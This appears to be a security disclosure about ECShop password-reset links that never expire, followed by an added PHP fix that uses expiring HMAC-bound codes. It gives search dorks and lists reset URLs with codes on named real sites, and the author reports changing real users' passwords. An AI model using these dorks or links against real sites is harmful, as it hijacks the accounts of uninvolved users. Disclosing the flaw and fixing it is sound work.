ECShop Arbitrary User Password Blind Change Vulnerability
Design defect in the ECShop password retrieval function: the password-change link does not expire.
Searching a search engine for keywords turns up links that can reset the passwords of some users on ECShop websites.
I just don't know the user name and cannot log on. I can only change the password blindly.
Google
inurl:user.php?act=get_password&uid=
Open a link:
http://class.enfamily.cn/user.php?act=get_password&uid=277576&code=09d77a40ca80fdfbd33315131e554bb0
Enter a password, for example, wooyun.
The user name has been modified but cannot be logged on.
Other Search Engines
Search for the keyword through bing.com: user.php?act=get_password&uid=
Example
http://www.yofus.com/user.php?act=get_password&uid=666167&code=e32d1180abe40484c2c3743e2393e5b0
Change the password to wooyun.
http://www.ziai168.com/user.php?act=get_password&uid=9086&code=f19cea38ba7af425a8d3eea5a0c4beb4
http://shop.careland.com.cn/user.php?act=get_password&uid=9163183&code=cad8dd2c08a321666e0da6a5bcc56e85
Solution:
Give the password-change code a limited validity period.
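
One way to implement this fix, as an added example that is not ECShop's own code: the reset code carries an expiry time and is an HMAC over the user id, the expiry and the current password hash, so it also stops working once the password has been changed. RESET_SECRET, the 30-minute lifetime, the function names and the sample values are assumptions.

```php
<?php
// Added example: expiring, single-use password-reset code (not ECShop's code).
// RESET_SECRET, RESET_TTL and both function names are assumptions.
const RESET_SECRET = 'replace-with-a-random-server-side-secret';
const RESET_TTL = 1800; // seconds a reset link stays valid

// Issue a code bound to the user id, an expiry time and the current password hash.
function make_reset_code(int $uid, string $password_hash, ?int $now = null): string
{
    $expires = ($now ?? time()) + RESET_TTL;
    $mac = hash_hmac('sha256', $uid . '|' . $expires . '|' . $password_hash, RESET_SECRET);
    return $expires . '.' . $mac;
}

// Accept the code only if it is well formed, unexpired, and still matches
// the user's current password hash (which changes after a successful reset).
function check_reset_code(int $uid, string $password_hash, string $code, ?int $now = null): bool
{
    $parts = explode('.', $code, 2);
    if (count($parts) !== 2 || !ctype_digit($parts[0])) {
        return false; // malformed code
    }
    [$expires, $mac] = $parts;
    if ((int) $expires < ($now ?? time())) {
        return false; // link has expired
    }
    // The expiry is covered by the MAC, so editing it in the URL invalidates the code.
    $expected = hash_hmac('sha256', $uid . '|' . $expires . '|' . $password_hash, RESET_SECRET);
    return hash_equals($expected, $mac); // constant-time comparison
}

// Constructed sample values, for demonstration only.
$uid = 1001;
$old_hash = 'constructed-old-password-hash';
$t0 = 1700000000; // fixed clock so the run is repeatable
$code = make_reset_code($uid, $old_hash, $t0);

var_dump(check_reset_code($uid, $old_hash, $code, $t0 + 60));               // fresh link
var_dump(check_reset_code($uid, $old_hash, $code, $t0 + 7200));             // link older than RESET_TTL
var_dump(check_reset_code($uid, 'constructed-new-hash', $code, $t0 + 60));  // password already changed
var_dump(check_reset_code($uid + 1, $old_hash, $code, $t0 + 60));           // code replayed for another uid
```

With this design an old link found in a search index fails both the expiry check and, once the account's password has changed, the MAC check.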